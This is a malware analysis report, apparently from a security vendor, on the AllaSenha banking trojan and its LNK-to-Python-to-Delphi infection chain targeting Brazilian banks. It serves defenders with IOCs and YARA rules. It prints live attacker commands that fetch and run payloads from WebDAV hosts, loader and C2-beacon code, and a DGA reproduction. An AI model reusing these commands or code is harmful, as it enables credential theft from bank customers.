AllaSenha: AllaKore variant leverages Azure cloud C2 to steal banking details in Latin America

Identifier: TRR240501.

Summary

Earlier in May, our security product spotted a malicious payload, which was tentatively delivered to a computer in Brazil, via an intricate infection chain involving Python scripts and a Delphi-developed loader.

The final malicious payload, that we named “AllaSenha”, is specifically aimed at stealing credentials that are required to access Brazilian bank accounts, leverages Azure cloud as command and control (C2) infrastructure, and is another custom variant of “AllaKore”, an infamous open-source RAT which is frequently leveraged to target users in Latin America.

This report describes the specific infection chain that we encountered, provides associated indicators of compromise (IOCs), and presents the AllaSenha malware.

Infection chain

The infection chain that we encountered (see Fig. 1) in May ends with the deployment and execution of AllaSenha. It starts with a malicious Windows shortcut file (LNK), which is disguised as a PDF file and distributed through WebDAV.

Overview of AllaSenha's deployment steps, from infection to delivery
Figure 1 – Overview of AllaSenha’s deployment steps, from infection to delivery

While we could not pinpoint the exact source of the malicious LNK delivery, we believe with medium to high confidence that it is a phishing link (that would be embedded in an email):

  • previous highly similar infections chains (leveraging common files and techniques) used phishing links in emails as an infection vector;
  • on the infection case we could analyse details for, the malicious LNK download (through WebDAV) has been triggered from a Web browser.

We could also identify likely previous variants of some of the described malicious tools, which were delivered in 2023, abusing public cloud hosting services (such as Autodesk A360 Drive or GitHub) to host malicious payloads. The final payloads were decrypted using the same techniques as the ones that are implemented by BPyCode (see later).

From the various reliable chronological information we could obtain about the malicious LNK and the staging servers they were served from, we believe with medium confidence that the attackers switched to the exact infection chain we describe in this report starting March 2024.

Malicious LNK

As a first step into the infection chain (see Fig. 1 above), an unidentified infection vector initiates a connection from the targeted computer to a WebDAV URL (191.232.38[.]222@80Documentos).

As a result, a standard Windows Explorer window is displayed to the user (see Fig. 2), listing the files that are staged at the remote WebDAV path: a malicious LNK file which is poorly masqueraded as a PDF document (NotaFiscal.pdf.lnk, SHA-256 8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535), and a directory (dc, which contains BPyCode launcher, a malicious BAT file):

191.232.38[.]222@80Documentos
├── dc/
│   └── c.cmd
└── NotaFiscal.pdf.lnk
Malicious files from the WebDAV server as presented to the targeted user
Figure 2 – Malicious files from the WebDAV server as presented to the targeted user

The targeted user, likely lured into thinking a PDF attachment must be opened, is expected to execute the malicious LNK (NotaFiscal.pdf.lnk). The LNK file in turn runs a Windows command shell, which creates and opens a fake invalid PDF file (NotaFiscal.pdf) in the user’s Downloads folder, then triggers the download and execution of BPyCode launcher (c.cmd):

%windir%system32cmd.exe /min /c "echo Indisponivel > %userprofile%downloadsNotaFiscal.pdf 
& start %userprofile%downloadsNotaFiscal.pdf
& start /min cmd.exe /c "191.232.38[.]222@80Documentosdcc.cmd""

We could identify several similar additional WebDAV paths and malicious LNK files, which are all listed in Appendix.

BPyCode launcher

The malicious LNK we described downloads and runs a malicious BAT payload (c.cmd, SHA-256 8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535), that we named “BPyCode launcher”, as part of its execution logic.

BPyCode launcher merely launches a base64-encoded PowerShell command. The resulting PowerShell script downloads the Python binary from the official python.org website, and drops it to a created folder, in the C:UsersPublic directory:

cd $ENV:public
$CP = ($env:COMPUTERNAME -replace "-","") -replace "DESKTOP", ""
$CP2 = -join ($CP[-1..-($CP.length)])
$CP3 = $CP2.ToLower()
$Folder2 = "${ENV:public}$CP3"
if (!(Test-Path -Path $Folder2 -PathType Container)) {
    Invoke-WebRequest -URI https://www.python.org/ftp/python/3.10.0/python-3.10.0-embed-win32.zip -OutFile "$CP3.zip";
    Expand-Archive "$CP3.zip" -DestinationPath $Folder2;
    Copy-Item -Path "$Folder2pythonw.exe" -Destination "$Folder2$CP3.exe"
}
& "$Folder2$CP3.exe" -c """import base64; exec(base64.b64decode('''''''''<BASE64-ENCODED PYTHON SCRIPT>''')); exit()""";

This PowerShell launcher uses the downloaded and renamed Python interpreter to further execute a base64-encoded Python script, which we named “BPyCode”.

Stage 1 – BPyCode: a Python DLL downloader and loader

BPyCode is a Python script that is in charge of downloading a DLL (“ExecutorLoader”), and executing it in-memory. The script was decoded from base64 (by the BPyCode launcher script), and never written as a file, so providing a hash to identify the exact BPyCode sample we analysed would not be relevant. However, BPyCode later writes a variant of itself as a file (SHA-256 6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e) during persistence setup – we listed all identified BPyCode files hashes in Appendix anyway.

BPyCode uses a domain generation algorithm (DGA) to generate a list of 3 hostnames (of the following pattern: <DGA>.brazilsouth.cloudapp.azure[.]com), as well as a list of 10 TCP ports. BPyCode tries to download a payload from one of the possible combinations of the generated hostnames and ports, and retries with additional combinations until it receives data.

# Hostnames generation algorithm from BPyCode
def lk():
    import hashlib
    from datetime import date
    try:
        d = date.today()
        wi = d.weekday()
        di = d.day + wi
        l = 'fghijlmnopqrstuvxzwkyjlmnopqabcghjlabcde'[di]
        r = []
        for _ in range(50, 61, 5):
            t = hashlib.sha1(f"{di*wi*_}{l}{wi}{l}{d.month * di*_}{l}{d.year*di*_}".encode()).hexdigest()*10
            r.append(t[:_].replace(t[:di], l).lower())
        return r
    except:
        return [f'google{di}']

Generated hostnames seem to match those that are associated with the Microsoft Azure Functions service, a serverless infrastructure that in this case would allow operators easily deploy and rotate their staging infrastructure.

The protocol that is used to download from staging servers is raw TCP. Before waiting for server-emitted data, BPyCode sends an identifier (pyCodeV10 - *NEWW*) and some basic information about the targeted computer (host’s processor name, Windows version and current username):

with ss.socket(ss.AF_INET, ss.SOCK_STREAM) as s:
    s.settimeout(30)
    s.connect((f'{choice(lk())}.brazilsouth.cloudapp.azure.com', choice(ptV5())))
    s.send(f'pyCodeV10 - *NEWW* {ss.gethostname()} | {vs} | {pr}'.encode())

The data that BPyCode expects in return is a Pickle-serialized dictionary which contains:

  • an additional Python loader script to execute;
  • a ZIP archive which contains the “PythonMemoryModule” Python package, which is aimed at loading a DLL in-memory;
  • another ZIP archive which contains ExecutorLoader, a PE library.

Both ZIP archives are encrypted (ZipCrypto) with the same password: Snh2301**Snh2301**.

The additional Python loader script that is provided by the server is executed in-memory from BPyCode (via the eval Python function):

  • it sets BPyCode persistence up, by writing a variant of a BPyCode script under C:UsersPublic<filename>.txt (where <filename> matches the folder name which is created by the BPyCode launcher), and creating a registry run key at HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun<filename>;
  • it decrypts and extracts downloaded ZIP archives in memory;
  • it leverages the PythonMemoryModule to dynamically load ExecutorLoader in-memory, then runs its entrypoint (the export namedForce).

During our analysis, we tried to alter the identifier that is sent from BPyCode to the staging servers (pyCodeXXX...) before downloading further data, and as a result we were able to obtain different payloads, but all match the delivery process that we describe, and ultimately lead to AllaSenha.

We also noted that the password which is used to protect downloaded ZIP archives may be extensively reused by the threat actor, as we were able to decrypt older and publicly available payloads using the same one. Decrypting older payloads also yielded different AllaSenha samples.

A last interesting detail is that BPyCode contains a sort of “killswitch” mechanism, as it will stop its execution in case the targeted computer’s processor name contains Broadwell. Broadwell is an Intel microarchitecture that was discontinued in 2018. The goal of this killswitch is not clear, but we speculate that this condition allows attackers to filter out appliances that are of no interest for the operators (the final payload being dedicated to workstations), or to avoid execution from some sandboxes we could not identify.

Stage 2 – ExecutorLoader: a simple Delphi-developed DLL loader

File name executor.dll
Compilation time 2024-05-02 10:44:22
Hash (SHA-256) 99d0de52a63e5ff790e468dbb8cd0d5273b51ca3b67b5963c0bdedc3a4f44f12

ExecutorLoader is a Borland Delphi (10.4) developed DLL which exports a single function called Force. This DLL is downloaded and executed in-memory by BPyCode, and is aimed at further decoding and executing the final payload (in our case, AllaSenha) which is embedded as a resource. To do so, ExecutorLoader injects the payload into a (renamed) mshta.exe instance.

The Force function first copies the system’s mshta.exe binary to another file using a random name, under a directory chosen in a predefined list:

Random directory selection function
Figure 3 – Random directory selection function

ExecutorLoader launches the copied binary using CreateProcessW, then loads one of its own resources (named RcDll) which holds a UPX-packed DLL (SHA-256 65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841 – which in our case is AllaSenha). The mshta.exe process is opened, memory is allocated using VirtualAlloc and the loaded resource is copied inside this allocated region:

Function injecting the UPX-packed payload in mshta.exe
Figure 4 – Function injecting the UPX-packed payload in mshta.exe

A thread is then created inside the remote mshta.exe process, to run the final payload (AllaSenha).

We could identify some older versions of ExecutorLoader, distributed as an executable binary, called Execute_dll.exe (and usually stored in a ZIP file called Execute_dll.zip, which would be encrypted using the same password as the one used by BPyCode). The code of this executable is exactly the same as the described DLL version, except of course for the entrypoint. This executable version has notably been hosted on GitHub at https://raw.githubusercontent[.]com/marinabarros320168/new/main/Execute_dll.exe.

AllaSenha, an AllaKore RAT variant

File name N/A
Compilation time 2024-05-02 10:44:07
Hash (SHA-256) 65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841

The final payload which is deployed from ExecutorLoader is a banking trojan that we named “AllaSenha”, and which is comprised of a single Windows 32bits UPX-packed DLL (once unpacked using UPX 4.2.2, its SHA-256 is ac4b4b6cfe4d4e8710384246c008764cdb7547a6c3081e72687fefdf0614c7a5).

AllaSenha targets Brazil’s main banks, such as Sicredi, Itaú Unibanco, Caixa, Banco Brazil, or Sicoob and aims at stealing passwords, 2-factor authentication (2FA) tokens and QR codes.

AllaSenha leverages Azure cloud as C2 infrastructure. It implement a DGA (in functions called GeraHost and GeraPorta – “Generate Host” and “Generate Port” in Portuguese), which generates a C2 hostname in the .brazilsouth.cloudapp.azure[.]com domain, as well as a port to connect to. AllaSenha DGA is diffent than the one in BPyCode, is based on the execution date, and may vary depending on the bank for which credentials are exfiltrated (one DGA modifier applies to Banco do Brasil only, another to Itaú Unibanco only). A reproduction of AllaSenha DGA is provided in Appendix – as an example, nhefxgbdedndzhebcfedufbgkfecgbccfecgbcc.brazilsouth.cloudapp.azure[.]com is a C2 hostname which has been generated on 2024-05-27.

Just like BPyCode, C2 communications between the malware and the server use raw ASCII text over a TCP socket. To handle part of these communications, AllaSenha appears to include a Delphi open-source library called ServerSocket, allowing basic RAT functionalities such as keyboard and mouse control, as well remote desktop cababilities. Interestingly, while AllaKore and ServerSocket do not seem to be directly related, both projects use the same name pattern for C2 commands (<|COMMAND|>), which may indicate that they are either often used in conjunction or inspired after one another.

All AllaSenha samples that we retrieved use Access_PC_Client_dll.dll as their original file name. This name can notably be found in the KL Gorki project, a banking malware which seems to combine components of both AllaKore and ServerSocket. As a result, we believe with medium to high confidence that AllaSenha is initially based on the KL Gorki source code in particular.

The list of commands found in AllaSenha offer a glimpse of malware’s capabitities:

<|ASS-BLUE-PJ|>
<|ASS-BLUE|>
<|ASS-SANTA|>
<|BB-AMARELO|>
<|BB-AZUL|>
<|BB-PASS6|>
<|BB-PASS8|>
<|BB-PROCURADOR|>
<|BLOQUEAR|>
<|CLOSEKEYBOARD|>
<|DESCO-TKAPP|>
<|DESCO-TKCHAVEIRO|>
<|FECHAR-ANYDESK|>
<|ITAU-SNH-CARTAO|>
<|ITAU-SNH-ENTRADA|>
<|ITAU-TK-APP|>
<|ITAU-TK-CHAVEIRO|>
<|ITAU-TK-SMS|>
<|LIMPAR-TECLAS|>
<|PRINCIPAL|>
<|PUXAR-TECLAS|>
<|QR-CONFIRMADO|>
<|REQUESTKEYBOARD|>
<|SAFRA-DADOS|>
<|SENHA|>Ass: 
<|SICOOB-HEIGTH|>
<|SICREDI-TOKEN-CELULAR|>
<|SICREDI-TOKEN-CHAVEIRO|>
<|START-CAPTURA|>
<|STN-6DG|>
<|STOP-CAPTURA|>
<|TAMANHO|>
<|UNICRED-ASS|>
<|UNICRED-TKN|>

Upon launch, AllaSenha reads the user’s browser data to search for credentials associated with targeted banks. If AllaSenha is unable to find any, it enters a “waiting” state in which it starts multiple threads to check if the user is performing actions associated with banking. Actions that can get AllaSenha to leave its waiting state include Internet browsing to a targeted banking website, the usage of the itauaplicativo.exe (from Itaú Unibanco) desktop application, or the saving of passwords associated with targeted banks in the browser password database. AllaSenha does not communicate with C2 servers if it has not found data of interest.

To deal with 2FA, which is enabled on most banking websites, AllaSenha has the ability to display dedicated hijacking windows requiring the targeted users to proceed with a second factor. Using the <|TRAVAR|> command, operators can freeze user’s desktop with a fake bank security plugin load screen:

AllaSenha fake security plugin load screen
Figure 5 – AllaSenha fake security plugin load screen

We believe this screen exists to give operators some time to interact with AllaSenha while trying to use stolen credentials for transactions. Operators can then issue AllaSenha commands to display 2FA validation windows on targeted user’s desktop, depending on the bank they are trying to connect to. For instance, operators can require a targeted user to validate an operator-initiated transaction by scanning a QR code, and entering a confirmation secret which would be provided by the Brasdesco mobile application (the QR code has been redacted in the following capture):

AllaSenha QR code-based hijacking window
Figure 6 – AllaSenha QR code-based hijacking window

Multiple 2FA windows are available for operators to hijack tokens of different types, such as in-app tokens, SMS tokens and QR codes.

Infrastructure

The threat actor leverages Azure cloud infrastructure as payload stagers and C2 servers.

Stagers

The WebDAV server which delivered the malicious LNK in the case that we described (191.232.38[.]222@80) had been setup the day before, and taken down the day after. This server only had a single HTTP server running on port 80, with a default Apache 2 index page. On this server, whose IP belongs to Microsoft (ASN 8075) and which is located in Brazil, a /Documentos directory containing a malicious LNK and a BPyCode launcher was staged.

We identified several other WebDAV paths matching Microsoft IPs in Brazil, which hosted both a NotaFiscal.pdf.lnk malicious LNK file (all samples that we retrieved triggered the same actions than we described) and a malicious BAT downloader:

WebDAV path Hosted Malicious LNK (SHA-256) Hosted BPyCode launcher Date of last WebDAV content modification
191.239.123[.]241@80Documentos 46e754727efdc2c891319d25a67ee999a4d8a0b21b0113db08eead42cf51b780 filesa3.cmd 2024-03-11
191.234.212[.]140@80Documentos 2c53b4dc15882cf22772994d8ed0947e4a8b70aef3a12ab190017b3317c167ea filesa3.cmd 2024-04-08
191.239.116[.]217@80Documentos a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef filesa3.cmd 2024-04-11
191.235.87[.]229@80Documentos 1b4f44a00f61b3e0c8cd6c3125f03b6d4897d6ab90c8a6dc899ed96acee80dd6 dcc.cmd 2024-04-30
191.232.38[.]222@80Documentos 8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535 dcc.cmd 2024-05-01
20.197.250[.]132@80Documentos Unknown dcc.cmd 2024-05-09

We could identify several additional WebDAV paths from malicious LNK samples, but we could not retrieve reliable chronological and exposed services information for the associated servers – they are all listed in Appendix.

The DGA function in BPyCode takes the current date as an argument to generate 3 distinct hostnames. We could determine that associated generated hostnames were setup to deliver payloads daily. At the time of writing, the threat actor seem to have stopped using *.brazilsouth.cloudapp.azure.com hostnames for payload delivery. The DGA methodology leveraged to connect to Azure-hosted (possibly “serverless”) infrastructure shows that the threat actor tried to automate the creation and rotation of its delivery infrastructure.

C2 servers

Command and control servers were also hosted on Azure cloud infrastructure. As described in the sample analysis, AllaSenha also implements a DGA which ensures a daily C2 hostnames rotation. At the time of writing, newly generated domains appear to be inactive, indicating that attackers may have either paused their activity, changed their C2 infrastructure or modified their DGA.

Attribution

We could not reliably link the described activities to a known and consistently defined threat actor.

Yet the malicious files we analysed contained some clues that might be useful for attribution. The initial malicious LNK for instance contained information about the computer from which the file was created:

ParsingPath: C:Usersbert1mDesktoptest.html
FolderPath: C:Usuáriosbert1mÁrea de Trabalho
MAC address: 94:53:30:e7:6f:42
Hostname: desktop-20a11ho

We can note that the local language of the computer on which the LNK file was generated is Portuguese (C:Usuários) – this is consistent with the targeting of AllaSenha (see below) and further language clues in BPyCode. AllaSenha samples that we retrieved (for instance, SHA-256 278897ee9158f9843125bc2e26c14f96c4e79d5fc578b7e5973dc8dc919a3400) also contained unstripped source code paths using the same bert1m username:

C:Usersbert1mDesktopMeu DriverDELPHI XE5ClienteZLibExApi.pas
C:Usersbert1mDesktopMeu DriverDELPHI XE5ClienteConectar.pas

This suggests that a single individual going by the bert1m nickname could be responsible for the development of multiple parts of the infection chain, from infection to the final malware. This however does not necessarily demonstrate that the developer is directly involved with the operation of such tools.

When searching for the bert1m nickname, we were able to find several public social media profiles, 2 of them at least matching Portuguese-speaking individuals, but could not reliably link any of those profiles further with any malicious activity or files.

Targets

Strictly sticking to the infection chain that we described and the resulting AllaSenha samples, we could only (and reliably) identify targets in Brazil. We do not benefit from enough contextual data to determine if individuals or organizations were specifically targeted.

Based on AllaSenha analysis, we can determine that the threat actor is specifically gathering credentials to access the following banks:

  • Banco do Brazil;
  • Bradesco;
  • Banco Safra;
  • Itaú Unibanco;
  • Sicoob;
  • Caixa Econômica Federal.

Conclusion

The ecosystem of cyber threats that specifically target Latin America, is the home of peculiar malware samples and uncommon practices – but those are sometimes combined to well known infection or delivery techniques that are quite usual to the cybercrime landscape. Attackers keep regularly changing malicious infrastructure, infection methods and loaders to evade defenses, and while used techniques remain relatively simple, the lack of documentation and the determination of these groups make them a real threat.

The threat actors that operate in Latin America appear to be a particularly productive source of cybercrime campaigns. While almost exclusively targeting Latin American individuals to steal banking details, these actors often end up compromising computers that are indeed operated by subsidiaries or employees in Brazil, but that belong to companies all around the world. As a result, such threats should not be underestimated and require proper response, way beyond the Brazilian borders.

Appendix

Indicators of compromise (IOCs)

Associated IOCs are also available on our GitHub repository.

Hashes (SHA-256)

f848c0f66afc7b5a10f060c1db129529a974ae0ad71a767f7c7793351bb7ca04|Malicious LNK (NotaFiscal.pdf.lnk)
c300749ea44f886be1887b3e19b946efbdbbc3e1bf3e416c78cfbff8d23bf70a|Malicious LNK (NotaFiscal.pdf.lnk)
0d94547a0b8f9795e97e2a4a58b0ece65b4ea4b6e6019cbc96e1c79f373b4587|Malicious LNK (NotaFiscal.pdf.lnk)
d9877dc1ba0f977d100e687da59c216454d27e3988532652ac8f6331debbd071|Malicious LNK (NotaFiscal.pdf.lnk)
a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef|Malicious LNK (NotaFiscal.pdf.lnk)
21e22c4736e7567b198b505ed303c3ca933e0c2d931b886756f6db18a9884a75|Malicious LNK (NotaFiscal.pdf.lnk)
2c1251ae1ec9d417bbbdd1f6ac99baa3f16a7639d0c12cb2883ef8c22c73e58e|Malicious LNK (NotaFiscal.pdf.lnk)
e50bde1e319e699f587d3b5403c487e46deed61cc3f078fe951e7cb9f6896259|Malicious LNK (NotaFiscal.pdf.lnk)
f00cb0603c055c85c7cdf9963d919d527b13013c182dc115ba733d28da57b1d9|Malicious LNK (NotaFiscal.pdf.lnk)
2c53b4dc15882cf22772994d8ed0947e4a8b70aef3a12ab190017b3317c167ea|Malicious LNK (NotaFiscal.pdf.lnk)
46e754727efdc2c891319d25a67ee999a4d8a0b21b0113db08eead42cf51b780|Malicious LNK (NotaFiscal.pdf.lnk)
cd9f5773bd7672a3e09f2d05ef26775e8c7241879d5f4d13c5c5bc1704c49fa1|Malicious LNK (NotaFiscal.pdf.lnk)
8424e76c9a4ee7a6d7498c2f6826fcde390616dc65032bebf6b2a6f8fbf4a535|Malicious LNK (NotaFiscal.pdf.lnk)
1b4f44a00f61b3e0c8cd6c3125f03b6d4897d6ab90c8a6dc899ed96acee80dd6|Malicious LNK (NotaFiscal.pdf.lnk)
4546bc56c85ad2967859dc34b2c84f15891fcd192e86bfc630c49dc8d59e3e71|BPyCode launcher (c.cmd)
40c37bfcc9b0e0d1b3840cb7c751162fec91fe833d4caf4a17bc8b97d53c88b5|BPyCode launcher (c.cmd)
a839dfbe1e7979dbd15ef6c5e472afb3efca044ee8ad27185b01161ce01e4f36|BPyCode launcher (a3.cmd)
610f0ec33603ef4d1fd6530a8f6b0121a4c9cc62fb6fa2ceee8e2f5b2f866e4c|BPyCode launcher (a3.cmd)
c0bf82a3f7807e0c88076e0d500b07e253b106914058b02e112d45eeb6209998|BPyCode launcher (a3.cmd)
6f05d8f85384808036d3c77732b056e2b9cd429587a77b6be3ccdbd4bb558023|BPyCode launcher (a3.cmd)
3962c8a4d0472f91d4be45140eccf661ad6c579319953156dec438dc6a07eeb2|BPyCode launcher (a3.cmd)
b2e1f630c4593830ead91e7f3615d8d5214762dc5a1dd65bef7382d6f6c9f258|BPyCode launcher (a3.cmd)
010d9f1f16c01db5ff37ff9b519d7ecf3be096e00ae597d7bec12b7099b2f852|BPyCode launcher (a3.cmd)
eb2cd71e72ff676d80eb746b961840fea3601d8f6402201d7c0e849a670240ee|BPyCode launcher (a3.cmd)
643563613fb78f88fd90a6cf253ace9e9e6686568fdf6b6d7ec9760667d4d72b|BPyCode
f2db799d892f2a7ac82bfa15826e74d778abdfa153ccafb9db1fdf56a0248a40|BPyCode
d051c0aee007f2a1d0026330719a45e81c726251015837e66cf9348df3bd7210|BPyCode
dd3f1829cc743942d1fc3719c8d8162bc45ca624352ac71f43c08dafd54bbb7f|BPyCode
8a1aba66841ae4b20df95eea8a271538453a76a53596fd3254d47d4d57a3ab3a|BPyCode
3b450994add1e3a206c56a7f8fd28e4132cffb27f3df345e07e8908d7989751f|BPyCode
35329c2fb7a1844576a5defd5d9a7d250d78db51479b2612e3923e18539b0695|BPyCode
19c02c5724622be4eedff95633f3fbaa604449aa50cc0761693bb8adb1e8cf97|BPyCode
5782b9bc96ce5ad011c122496ff0ff0dc08d6444c6d2e98606ada82130d5f21a|BPyCode
6149a3d1cff3afe3ebb9ac091844a3b7db7533aa69801c98d00b19cdb8b18c9e|BPyCode persistence (C:UsersPublic<filename>.txt)
99d0de52a63e5ff790e468dbb8cd0d5273b51ca3b67b5963c0bdedc3a4f44f12|ExecutorLoader (executor.dll)
3b0eb25ed6c0dff76a613bdcfd20ca1d2f482e3c1739747bf50834ca784e66bb|ExecutorLoader (executor.dll)
19594c51c61fc5fd833ddd0eecb648acebdf4d789b337f00cda0a03efbb1afcf|ExecutorLoader (executor.dll)
7e0051d9221c13a47245359a2cd2804b4d3d9302a321fc8085da1cf1a64bac91|ExecutorLoader (Execute_dll.exe)
b8b3963967232916cd721a22c80c11cd33057bd5629dcfa3f4b03d8a6dbf1403|ExecutorLoader (Execute_dll.exe)
e7aa64726783ec6f7249483e984ae20b31a091a488a3ed0f83c210702c506d20|ExecutorLoader (Execute_dll.exe)
65d86160cd4a08d60ada7fcafb7ed9493bf6dacfa098dba27f7851f1bb8de841|UPX-packed AllaSenha
ac4b4b6cfe4d4e8710384246c008764cdb7547a6c3081e72687fefdf0614c7a5|UPX-unpacked AllaSenha
b152346c2679392d7e15d1cc72a39a21d24e55360c4c1c845ef3524924e93fa9|AllaSenha
7232e3318fdc370e611b2bcbaaec3d58a0d687927714c24dc81fe60767d53a31|AllaSenha
883c49b7c869019951eff94699480a7ecc97c9c45060a15797ecbd5fce060d26|AllaSenha
561e6a42e23d12abe6bba8c98f84c3ba7c45a5df840bfa6fd0dfea803c9b4b7e|AllaSenha
ab3a284ae6e4e466a0715c162cfab85d75522bec48fa25947b16a0891ec2358a|AllaSenha
278897ee9158f9843125bc2e26c14f96c4e79d5fc578b7e5973dc8dc919a3400|AllaSenha
3c89775ae7c35fe3d1ec7e75ac9d4a19959d082d31ab412af243125440ffea6c|AllaSenha

URLs

abrir-documento-adobe-reader-1.brazilsouth.cloudapp.azure[.]com@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
104.41.57[.]122@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.235.235[.]69@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
4.203.105[.]118@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.234.212[.]140@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.233.241[.]96@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.232.38[.]222@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.239.116[.]217@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
104.41.51[.]80@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.235.233[.]246@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.233.248[.]170@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.239.123[.]241@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
191.235.87[.]229@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
20.197.250[.]132@80Documentos|WebDAV stager path (on legitimate Azure infrastructure)
hxxps://raw.githubusercontent[.]com/marinabarros320168/new/main/Execute_dll.exe|ExecutorLoader staging URL (on legitimate Github infrastructure)
hxxps://raw.githubusercontent[.]com/alexiadarocha195267/rp/raw/main/Execute_dll.zip|ExecutorLoader staging URL (on legitimate Github infrastructure)
hxxp://jucatyo6.autodesk360[.]com/shares/download/file/SHd38bfQT1fb47330c999c2a86b9a6d091b6/dXJuOmFkc2sud2lwcHJvZDpmcy5maWxlOnZmLnY0Uk5ubHlyU0JXd0hlLXJyZWk0T2c_dmVyc2lvbj0x?bfccc0fd975348c980dd89e57f94815f|Stager for a likely associated and previous variant of BPyCode execution (on legitimate AutoDesk infrastructure)
hxxps://dpsols7.autodesk360[.]com/shares/download/file/SHd38bfQT1fb47330c99c55d44aacebd2ec7/dXJuOmFkc2sud2lwcHJvZDpmcy5maWxlOnZmLjhZc1hBS2Q2VHNDa0Z1NkZ0Q2tQdHc_dmVyc2lvbj00?b44bb61abebf41d695a4580f072d9b74|Stager for a likely associated and previous variant of BPyCode execution (on legitimate AutoDesk infrastructure)

YARA rules

rule allasenhamaycampaign_executorloader
{
    meta:
        description = "Detects Delphi ExecutorLoader DLLs and executables."
        references = "TRR240501"
        date = "2024-05-28"
        author = "HarfangLab"
        context = "file,memory"
    strings:
        $delphi = "Embarcadero Delphi" ascii fullword
        $s1 = "SysWOW64mshta.exe" wide fullword
        $s2 = "System32mshta.exe" wide fullword
        $s3 = "RcDll" wide fullword
        $default1 = "Default_" wide fullword
        $default2 = "Default~" wide fullword
    condition:
        $delphi
        and all of ($s*)
        and any of ($default*)
}

rule allasenhamaycampaign_allasenha
{
    meta:
        description = "Detects AllaSenha banking trojan DLLs."
        references = "TRR240501"
        date = "2024-05-28"
        author = "HarfangLab"
        context = "file,memory"
    strings:
        $a1 = "<|NOSenha|>" wide fullword
        $a2 = "<|SENHA|>QrCode: " wide fullword
        $a3 = "<|SENHA|>Senha 6 : " wide fullword
        $a4 = "<|SENHA|>Snh: " wide fullword
        $a5 = "<|SENHA|>Token: " wide fullword
        $a6 = "<|BB-AMARELO|>" wide fullword
        $a7 = "<|BB-AZUL|>" wide fullword
        $a8 = "<|BB-PROCURADOR|>" wide fullword
        $a9 = "<|ITAU-SNH-CARTAO|>" wide fullword
        $a10 = "<|ITAU-TK-APP|>" wide fullword
        $dga = { 76 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 78 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 7A 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 77 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 6B 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 79 00 00 00 }
    condition:
        $dga
        and (4 of ($a*))
}

AllaSenha DGA

This Python code snippet is reproducing the logic of AllaSenha’s domain generation algorithm (which is generating C2 hostnames).

import datetime

def day_to_letter(i):
    if i > 26:
        i //= 2
    return "_abcdefghijlmnopqrstuvxzwky"[i]

def to_signed_str(unsigned_value):
    """
    Converts an integer into the corresponding signed value, returned as a string.
    :param unsigned_value: The input integer to convert
    :return: The corresponding string
    """
    bit_length = 32
    if unsigned_value >= 2**(bit_length - 1):
        signed_value = unsigned_value - 2**bit_length
    else:
        signed_value = unsigned_value
    return str(signed_value)

def intstr_to_domain(s):
    """
    The input is a string which contains only digits. This function takes them either one or two at a time
    to be used as indexes in a hardcoded array. If taking two digits makes for too big an index, only one
    is used - this explains the huge disparity in the distribution of letters.
    :param s:
    :return:
    """
    key = "__abcdefghijlmnopqrstuvxzwky"
    out = ""
    i = 0
    while i < len(s):
        if i == len(s) - 1 or int(s[i:i+2]) >= 28:
            if int(s[i:i+1]) >= 2:
                out += key[int(s[i])]
            i += 1
        else:
            if int(s[i:i+2]) >= 2:
                out += key[int(s[i:i+2])]
            i += 2
    return out.rstrip('_')

d = datetime.datetime(year=2024, month=5, day=28)  # Change to the desired date
day_of_year = d.timetuple().tm_yday
day_of_week = (d.weekday() + 1) % 7 + 1
week_of_year = d.isocalendar()[1]
domain = day_to_letter(d.day)

key = {
    "ITAU-APP": 0x55,
    "BB": 0x56,
    "default": 0x57
}
multiplicator = key["default"]

calculus1 = d.day**2 * day_of_year * multiplicator**3 & 0xFFFFFFFF
calculus2 = day_of_year**2 * d.day * multiplicator & 0xFFFFFFFF
calculus3 = day_of_year * d.day * multiplicator & 0xFFFFFFFF
calculus4 = d.month * day_of_year * d.day * multiplicator & 0xFFFFFFFF
calculus5 = week_of_year * day_of_year * d.day * multiplicator & 0xFFFFFFFF

input_str = (f"{to_signed_str(calculus1)}{to_signed_str(calculus2)}{to_signed_str(calculus3)}{to_signed_str(calculus4)}"
             f"{to_signed_str(calculus5)}{to_signed_str(calculus5)}")

print(domain + intstr_to_domain(input_str) + ".brazilsouth.cloudapp.azure[.]com")


Source: Original Post